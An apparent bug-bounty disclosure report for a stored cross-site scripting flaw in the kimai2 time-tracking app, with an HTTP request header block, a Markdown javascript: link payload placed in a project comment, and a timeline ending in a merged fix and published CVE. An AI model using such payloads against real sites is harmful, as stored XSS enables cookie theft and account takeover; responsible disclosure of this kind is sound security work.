Cross-site Scripting (XSS) - Stored in kevinpapst/kimai2


Reported on

Nov 16th 2021


Stored XSS via Markdown at the comment in Project

Proof of Concept

// PoC.req
POST /kimai2/public/en/admin/project/3/comment_add HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Connection: close
Cookie: PHPSESSID=j5phlsvo13ou7dqv96ibtabq9o
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Step to Reproduce

Create a new project at comment section input with payload: [XSS](javascript:alert(`XSS`))

The XSS will trigger when the user click on the content of comment


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the kevinpapst/kimai2 team within 24 hours. 18 days ago
lethanhphuc modified their report
18 days ago
lethanhphuc modified their report
18 days ago
We have contacted a member of the kevinpapst/kimai2 team and are waiting to hear back 17 days ago
lethanhphuc submitted a
15 days ago
15 days ago



Kevin Papst validated this vulnerability 15 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Papst confirmed that a fix has been merged on 76e094 15 days ago
Kevin Papst has been awarded the fix bounty
Jamie Slome
3 days ago


CVE published! 🎊